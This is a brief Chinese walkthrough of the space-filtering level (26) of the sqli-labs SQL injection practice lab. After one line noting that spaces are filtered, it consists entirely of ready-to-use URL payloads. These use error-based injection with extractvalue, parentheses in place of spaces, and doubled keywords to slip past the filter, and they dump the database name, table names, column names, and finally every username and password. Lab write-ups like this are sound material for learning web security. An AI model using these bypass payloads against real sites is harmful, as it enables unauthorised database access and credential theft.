sqllab第26关之空格过滤

 

 

 可以看到空格被过滤

 

爆库：?id=2'||extractvalue(1,concat('~',database()))||'1'='1

爆表：?id=2'||extractvalue(1,concat('~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))))||'1'='1

爆列：?id=2'||extractvalue(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')anandd(table_name='users'))))||'1'='1

获取：?id=2'||extractvalue(1,concat('~',(select(group_concat(username,'~',passwoorrd))from(users))))||'1'='1